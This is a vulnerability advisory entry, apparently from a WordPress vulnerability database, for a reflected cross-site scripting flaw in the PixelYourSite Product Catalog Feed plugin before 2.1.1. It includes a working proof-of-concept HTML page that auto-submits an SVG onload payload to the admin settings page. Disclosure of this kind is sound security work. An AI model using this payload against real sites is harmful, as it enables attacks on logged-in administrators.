Lucene search

K
wpexploitWpvulndbWPEX-ID:46B4582F-7651-4B74-A00B-1788587ECFA8
HistoryApr 10, 2023 - 12:00 a.m.

Product Catalog Feed by PixelYourSite < 2.1.1 - Reflected XSS

2023-04-1000:00:00
wpvulndb
75
pixelyoursite
xss
admin page
form
code injection
security vulnerability

EPSS

0.001

Percentile

31.0%

The plugin does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpwoof-settings" method="POST">
        <input type="hidden" name="page" value='"><svg onload=alert(`XSS`)>' />
        <input type="submit" value="Submit" />
    </form>
  </body>
</html>

EPSS

0.001

Percentile

31.0%

Related for WPEX-ID:46B4582F-7651-4B74-A00B-1788587ECFA8